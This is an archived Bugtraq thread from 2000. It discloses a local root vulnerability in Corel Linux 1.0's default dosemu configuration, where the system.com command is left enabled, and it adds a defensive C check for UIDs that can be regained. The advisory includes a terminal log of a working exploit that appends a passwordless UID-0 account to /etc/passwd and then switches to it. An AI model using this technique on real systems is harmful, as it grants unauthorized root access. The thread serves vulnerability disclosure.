
Bugtraq mailing list archives

Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
From: sarnold () WILLAMETTE EDU (Seth R Arnold)
Date: Fri, 3 Mar 2000 10:33:51 -0800


I tested this on debian's dosemu, Version: 0.98.8-2, (debian woody) and
did not get these results. It seems the debian maintainer (Herbert Xu)
Did The Right Thing in the config file.

:)

* suid () SUID KG <suid () SUID KG> [000303 10:28]:
Re all,

Hadn't seen this one around yet, has been on my site for about a week now.

Corel's mailserver bounced me about this IIRC? What's up Corel?

Cheers.

----------------------------

suid () suid kg - Corel Linux dosemu config error. Local root compromise.

Software:     Corel Linux 1.0 dosemu distribution configuration
URL:          http://linux.corel.com
Version:      Version 1.0
Platforms:    Corel Linux only.
Type:         Default misconfiguration. No one reads README anymore??

Summary:

      Local users can take advantage of a packaging and configuration
      error (which has been known and documented for a long time) to
      execute arbitrary commands as root.

      We see from the doc/README/SECURITY file as well as
      http://www.dosemu.org/docs/README/0.98/README-3.html
      written in 1997 that this configuration is bad.

Vulnerability:

      The system.com command is available to any user who runs the
      dos emulator. This is a direct violation of the advice from
      the SECURITY readme file:

              Never allow the 'system.com' command (part of dosemu)
              to be executed. It makes dosemu
              execute the libc 'system() function'. Though privileges
              are turned off, the process inherits the
              switched uid-setting (uid=root, euid=user), hence the
              unix process can use setreuid to gain root
              access back. ... the rest you can imagine yourself.

Exploit:

      This is a script log which details how to reproduce this:

      
              Script started on Fri Feb 25 13:54:00 2000
              nebula:~$ id
              uid=1000(suid) gid=1000(suid) groups=1000(suid)
              nebula:~$ cat > hack-corel
              #!/bin/bash
              echo "owned::0:0::/:/bin/bash" >> /etc/passwd
              ^D
              nebula:~$ chmod a+rx hack-corel
              nebula:~$ export PATH="$PATH:."
              nebula:~$ dos
              CPU speed set to 430/1 MHz
              Running on CPU=586, FPU=1, rdtsc=1

                      [ snip bunch of dosemu crap ]

              "Welcome to dosemu 0.98!
              C:\> system hack-corel;
              sh: : command not found
              C:\> exitERROR: general protection at 0x3f0ff: 0
              ERROR: SIGSEGV, protected insn...exiting!

              nebula:~$ tail -1 /etc/passwd
              owned::0:0::/:/bin/bash
              nebula:~$ su owned
              nebula:/home/suid# id
              uid=0(root) gid=0(root) groups=0(root)
              nebula:/home/suid# exit
              exit
              nebula:~$ exit

              Script done on Fri Feb 25 13:55:27 2000

Note:
      This is not a vulnerability in dosemu itself. The documentation
      warns users very specifically that this will happen if the system
      is configured as such.

Greets:

      duke
      cr
      active
      

--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
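
The README passage quoted in the advisory turns on the difference between a temporary and a permanent privilege drop: with uid=root and euid=user, root is still recoverable. As an added example (not code from the post, from dosemu or from Corel; the function names are hypothetical and it assumes a Unix libc that provides getresuid()), this C code checks the real, effective and saved UIDs before a command is handed to system():

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Declared explicitly so the example does not depend on feature macros. */
int getresuid(uid_t *ruid, uid_t *euid, uid_t *suid);

/* Returns 1 if a process holding these real/effective/saved UIDs is root
 * or can switch its effective UID back to root (temporary drop only). */
int can_regain_root(uid_t ruid, uid_t euid, uid_t suid)
{
    if (euid == 0)
        return 1;                  /* nothing was dropped at all */
    return ruid == 0 || suid == 0; /* setreuid()/seteuid() may restore 0 */
}

/* Same check for the calling process. Returns -1 on error. */
int current_process_can_regain_root(void)
{
    uid_t r, e, s;
    if (getresuid(&r, &e, &s) != 0)
        return -1;
    return can_regain_root(r, e, s);
}

/* Hypothetical wrapper: call system() only when neither this process nor
 * the child it spawns can get root back. Returns -1 if it refuses. */
int guarded_system(const char *cmd)
{
    if (current_process_can_regain_root() != 0) {
        fprintf(stderr, "refusing system(): root UID still recoverable\n");
        return -1;
    }
    return system(cmd);
}

int main(void)
{
    /* Constructed case matching the README text: uid=root, euid=user. */
    printf("uid=0 euid=1000 suid=1000 -> %d\n", can_regain_root(0, 1000, 1000));
    printf("current process -> %d\n", current_process_can_regain_root());
    return 0;
}
```

The check does not account for Linux capabilities or group IDs, which a setuid program would also need to drop.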


